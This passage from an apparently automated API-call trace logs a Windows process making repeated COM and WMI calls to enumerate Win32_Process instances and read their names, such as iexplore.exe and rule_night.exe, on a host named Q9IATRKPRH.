ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0212.506] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ede0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56057c8) returned 0x0 [0212.506] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56057c8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.507] WbemDefPath:IUnknown:Release (This=0x56057c8) returned 0x3 [0212.507] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0212.507] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0212.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ede0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0212.507] WbemDefPath:IUnknown:Release (This=0x560ede0) returned 0x2 [0212.507] WbemDefPath:IUnknown:Release (This=0x560ede0) returned 0x1 [0212.507] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0212.507] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0212.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ede0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560ede0) returned 0x0 [0212.507] WbemDefPath:IUnknown:AddRef (This=0x560ede0) returned 0x3 [0212.507] WbemDefPath:IUnknown:Release (This=0x560ede0) returned 0x2 [0212.507] WbemDefPath:IWbemPath:SetText (This=0x560ede0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2124\"") returned 0x0 [0212.507] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0212.507] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0212.507] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.507] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0212.507] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0212.507] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.507] IWbemClassObject:Get (in: This=0x560fc30, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267e860*=0, plFlavor=0x267e864*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x267e860*=8, plFlavor=0x267e864*=0) returned 0x0 [0212.507] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0212.508] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0212.508] IWbemClassObject:Get (in: This=0x560fc30, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267e860*=8, plFlavor=0x267e864*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x267e860*=8, plFlavor=0x267e864*=0) returned 0x0 [0212.508] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0212.508] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0212.508] CoTaskMemAlloc (cb=0x4) returned 0x5478ff0 [0212.508] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5478ff0, puReturned=0x267acc0 | out: apObjects=0x5478ff0*=0x5611770, puReturned=0x267acc0*=0x1) returned 0x0 [0212.610] IUnknown:QueryInterface (in: This=0x5611770, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5611770) returned 0x0 [0212.611] IUnknown:QueryInterface (in: This=0x5611770, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0212.611] IUnknown:QueryInterface (in: This=0x5611770, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0212.611] IUnknown:AddRef (This=0x5611770) returned 0x3 [0212.611] IUnknown:QueryInterface (in: This=0x5611770, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0212.611] IUnknown:QueryInterface (in: This=0x5611770, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0212.611] IUnknown:QueryInterface (in: This=0x5611770, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5611774) returned 0x0 [0212.611] IMarshal:GetUnmarshalClass (in: This=0x5611774, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0212.611] IUnknown:Release (This=0x5611774) returned 0x3 [0212.611] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0212.611] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0212.612] IUnknown:QueryInterface (in: This=0x5611770, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0212.612] IUnknown:Release (This=0x5611770) returned 0x2 [0212.612] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0212.612] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0212.612] IUnknown:QueryInterface (in: This=0x5611770, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5611770) returned 0x0 [0212.612] IUnknown:AddRef (This=0x5611770) returned 0x4 [0212.612] IUnknown:Release (This=0x5611770) returned 0x3 [0212.612] IUnknown:Release (This=0x5611770) returned 0x2 [0212.612] CoTaskMemFree (pv=0x5478ff0) [0212.612] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0212.612] IUnknown:AddRef (This=0x5611770) returned 0x3 [0212.612] IWbemClassObject:Get (in: This=0x5611770, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0212.613] IWbemClassObject:Get (in: This=0x5611770, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2300\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0212.613] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2300\"") returned 0x66 [0212.613] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2300\"") returned 0x66 [0212.613] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0212.613] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0212.613] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0212.613] IUnknown:Release (This=0x6d0cac) returned 0x1 [0212.614] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5478ff0) returned 0x0 [0212.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x5478ff0, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0212.615] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5478ff0, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560eec0) returned 0x0 [0212.615] WbemDefPath:IUnknown:Release (This=0x5478ff0) returned 0x0 [0212.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eec0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560eec0) returned 0x0 [0212.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eec0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0212.615] WbemDefPath:IUnknown:AddRef (This=0x560eec0) returned 0x3 [0212.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eec0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0212.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eec0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0212.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eec0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5479030) returned 0x0 [0212.615] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5479030, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.615] WbemDefPath:IUnknown:Release (This=0x5479030) returned 0x3 [0212.615] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0212.616] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0212.616] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eec0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0212.616] WbemDefPath:IUnknown:Release (This=0x560eec0) returned 0x2 [0212.616] WbemDefPath:IUnknown:Release (This=0x560eec0) returned 0x1 [0212.616] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0212.616] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0212.616] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eec0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560eec0) returned 0x0 [0212.616] WbemDefPath:IUnknown:AddRef (This=0x560eec0) returned 0x3 [0212.616] WbemDefPath:IUnknown:Release (This=0x560eec0) returned 0x2 [0212.616] WbemDefPath:IWbemPath:SetText (This=0x560eec0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2300\"") returned 0x0 [0212.616] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0212.616] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0212.616] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.616] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0212.616] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0212.616] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.616] IWbemClassObject:Get (in: This=0x5611770, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267f0d4*=0, plFlavor=0x267f0d8*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="rule_night.exe", varVal2=0x0), pType=0x267f0d4*=8, plFlavor=0x267f0d8*=0) returned 0x0 [0212.617] SysStringByteLen (bstr="rule_night.exe") returned 0x1c [0212.617] SysStringByteLen (bstr="rule_night.exe") returned 0x1c [0212.617] IWbemClassObject:Get (in: This=0x5611770, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267f0d4*=8, plFlavor=0x267f0d8*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="rule_night.exe", varVal2=0x0), pType=0x267f0d4*=8, plFlavor=0x267f0d8*=0) returned 0x0 [0212.617] SysStringByteLen (bstr="rule_night.exe") returned 0x1c [0212.617] SysStringByteLen (bstr="rule_night.exe") returned 0x1c [0212.617] CoTaskMemAlloc (cb=0x4) returned 0x5479060 [0212.617] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5479060, puReturned=0x267acc0 | out: apObjects=0x5479060*=0x5611430, puReturned=0x267acc0*=0x1) returned 0x0 [0212.699] IUnknown:QueryInterface (in: This=0x5611430, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5611430) returned 0x0 [0212.699] IUnknown:QueryInterface (in: This=0x5611430, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0212.699] IUnknown:QueryInterface (in: This=0x5611430, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0212.700] IUnknown:AddRef (This=0x5611430) returned 0x3 [0212.700] IUnknown:QueryInterface (in: This=0x5611430, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0212.700] IUnknown:QueryInterface (in: This=0x5611430, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0212.700] IUnknown:QueryInterface (in: This=0x5611430, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5611434) returned 0x0 [0212.700] IMarshal:GetUnmarshalClass (in: This=0x5611434, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0212.700] IUnknown:Release (This=0x5611434) returned 0x3 [0212.700] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0212.700] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0212.700] IUnknown:QueryInterface (in: This=0x5611430, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0212.700] IUnknown:Release (This=0x5611430) returned 0x2 [0212.700] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0212.700] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0212.700] IUnknown:QueryInterface (in: This=0x5611430, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5611430) returned 0x0 [0212.700] IUnknown:AddRef (This=0x5611430) returned 0x4 [0212.700] IUnknown:Release (This=0x5611430) returned 0x3 [0212.700] IUnknown:Release (This=0x5611430) returned 0x2 [0212.700] CoTaskMemFree (pv=0x5479060) [0212.701] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0212.701] IUnknown:AddRef (This=0x5611430) returned 0x3 [0212.701] IWbemClassObject:Get (in: This=0x5611430, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0212.701] IWbemClassObject:Get (in: This=0x5611430, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2308\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0212.701] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2308\"") returned 0x66 [0212.701] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2308\"") returned 0x66 [0212.701] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0212.702] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0212.702] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0212.702] IUnknown:Release (This=0x6d0cac) returned 0x1 [0212.703] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5479060) returned 0x0 [0212.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x5479060, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0212.703] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5479060, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560efa0) returned 0x0 [0212.703] WbemDefPath:IUnknown:Release (This=0x5479060) returned 0x0 [0212.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x560efa0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560efa0) returned 0x0 [0212.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x560efa0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, 